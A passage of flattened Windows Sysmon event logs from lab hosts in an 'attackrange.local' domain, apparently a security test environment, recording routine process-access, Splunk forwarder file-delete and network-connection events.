21:49:11.169{896A638B-B8E2-6058-B102-00000000AE01}42447692C:\Windows\Explorer.EXE{896A638B-FBAD-6058-BE11-00000000AE01}4492C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917032Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.166{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-FBAD-6058-BF11-00000000AE01}100C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b7f60|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917031Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.165{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-FBAD-6058-BF11-00000000AE01}100C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+112150|C:\Windows\System32\SHELL32.dll+b7f1c|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917030Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.165{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-FBAD-6058-BF11-00000000AE01}100C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b7ef0|C:\Windows\System32\TwinUI.dll+12d4e1|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917029Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:11.165{896A638B-B8E2-6058-B102-00000000AE01}42445500C:\Windows\Explorer.EXE{896A638B-FBAD-6058-BF11-00000000AE01}100C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d319|C:\Windows\System32\TwinUI.dll+12dfcf|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917043Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:12.947{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=293E341E97C63C58C5003081FCC8189D,SHA256=69F15970A7434A7654A9D7DB6744D289693A54C51442E8B4BB6A180DC33EC3E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638410Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:12.586{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=907BD09E9FFE4179697A29105BE53A99,SHA256=3544CFB2F610E3D0A9CD563AA33C7E5B2352E3EAEC12B48BD1D5F505654E7B5F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917042Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:12.718{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917041Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:12.718{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x8000000000000000638409Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:12.226{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F542C08DD287880F4D0459DEAFEAADBC,SHA256=37928DAE16312699B7B428FF52D9C239F16453EBEB008B8228FBCC5C837CEB27,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917046Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:13.951{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8113CAB37D4EA77D4A97AA513B6BE73D,SHA256=0B19881AEDD713C537E41B9C7849B274C7294C0BC236CE1076AF187F0A4E5789,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638412Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:13.632{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8253AF0245E0FBC7D0548EAE3BAFA6D,SHA256=0610DD563392208E1977278E22E7563A2CD3634BC9C85F356F7F04944F490A83,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917045Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:13.718{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917044Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:13.718{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x8000000000000000638411Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:08.522{BFB545BB-B903-6058-D000-00000000AF01}1216C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-692.attackrange.local57246-false10.0.1.12ip-10-0-1-12.us-west-2.compute.internal8000- 23542300x80000000000000005917050Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:14.955{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC121438AB5C43D836F94C6EB85C8A11,SHA256=3F28FF702C915E6BFE0BB3252911BB68565469498996F1EC651CF236A02CC58A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638413Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:14.648{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FD4B3A350479D631B588443856A4F71,SHA256=68AED17EA799389ECC4E079351B636A6D24C2179CF28729125512033483817E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000005917049Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:14.856{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0BEC1AB0D39B168D91D6BCDC0C692DB6,SHA256=CD4860674DCA5061DF5758478212571C06613790BAD687BFE19BACE6E2235BF6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917048Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:14.718{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917047Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:14.718{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917053Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:15.959{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=786EF310829B297713786BBADC86DAAF,SHA256=0C1A2AE6D48B3A7430E6C91DEF7243AD04D513669893BA15F91758449D5C41D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638414Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:15.679{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78EDA6C7DEBD8DCB8022D03F4646CA52,SHA256=214AA84324DC0F2C118ABEDDA1E5B31ABDFB660FCE5408911E72CE00AD192B56,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917052Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:15.719{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917051Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:15.719{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917056Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:16.974{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B536165CD678952A26C01559B721E415,SHA256=C5E7CBFE69DBDCEA245BBDCD3107A45BBC216DBFB531636B80283E99FD496CF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638415Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:16.695{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A6D394B3040819D86EABD965BDF80FA,SHA256=1CC9CB1A1B82AB40D06843BE62F867618C16F854A56F5CDE6740A5B86E19EDCF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917055Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:16.719{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917054Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:16.719{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000005917061Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:17.995{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDAE37DFC65CBAFF71CDD93E15E31077,SHA256=73674F40AEE2A07112A1F84C6967769B45963D1E9343E3C8FFB0EE6286098A15,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638418Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:17.726{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=13DF04135567FA9FB8E0D92752D28983,SHA256=1F43CDEFF162D11A2C0B5A3608D176A908259645DFE203103E120C25B4E787C6,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917060Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:17.719{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917059Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:17.719{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 354300x80000000000000005917058Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:14.744{896A638B-FDEB-6058-7912-00000000AE01}1496C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-792.attackrange.local1484-false10.0.1.12-8000- 23542300x80000000000000005917057Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:17.156{896A638B-FDF2-6058-8212-00000000AE01}2788NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9DA7D736EECC8AF3A61CD31F5E25A936,SHA256=80FB7CE5D5D23C9AD09C662429996888E7E396791739A89C08A00B8A45993BDD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638417Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:17.351{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15B79E7D7DB520E1738B106689809EFF,SHA256=6F6784BB8BD5FE4CE8DA1E3070577FBB085546C1E05CCA7BC9368BE055B5BA9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638416Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:17.351{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=26D2F83FF51B74B77013FF44B0B58B86,SHA256=40C4CF3F5E1A20AF9F3582FDC2A3452A462385F3AD8AEC0EBFBF7E9FA8CA094E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000638420Microsoft-Windows-Sysmon/Operationalwin-host-692.attackrange.local-2021-03-24 21:49:18.757{BFB545BB-B909-6058-D900-00000000AF01}4084NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66524C1A53F36ADCE3E2308078172BAA,SHA256=A09700C5BE3FC9A2E37F6F330C16B2FED90034C197762C34ABC8634394FFA785,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000005917102Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.720{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917101Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.720{896A638B-B5CA-6058-0C00-00000000AE01}824952C:\Windows\system32\svchost.exe{896A638B-B8F2-6058-D402-00000000AE01}5648C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+347df|C:\Windows\SYSTEM32\psmserviceexthost.dll+32779|C:\Windows\SYSTEM32\psmserviceexthost.dll+22da9|C:\Windows\SYSTEM32\psmserviceexthost.dll+1ede4|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917100Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.482{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917099Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 21:49:18.482{896A638B-B5CA-6058-0D00-00000000AE01}884904C:\Windows\system32\svchost.exe{896A638B-B8F4-6058-D702-00000000AE01}5884C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000005917098Microsoft-Windows-Sysmon/Operationalwin-dc-792.attackrange.local-2021-03-24 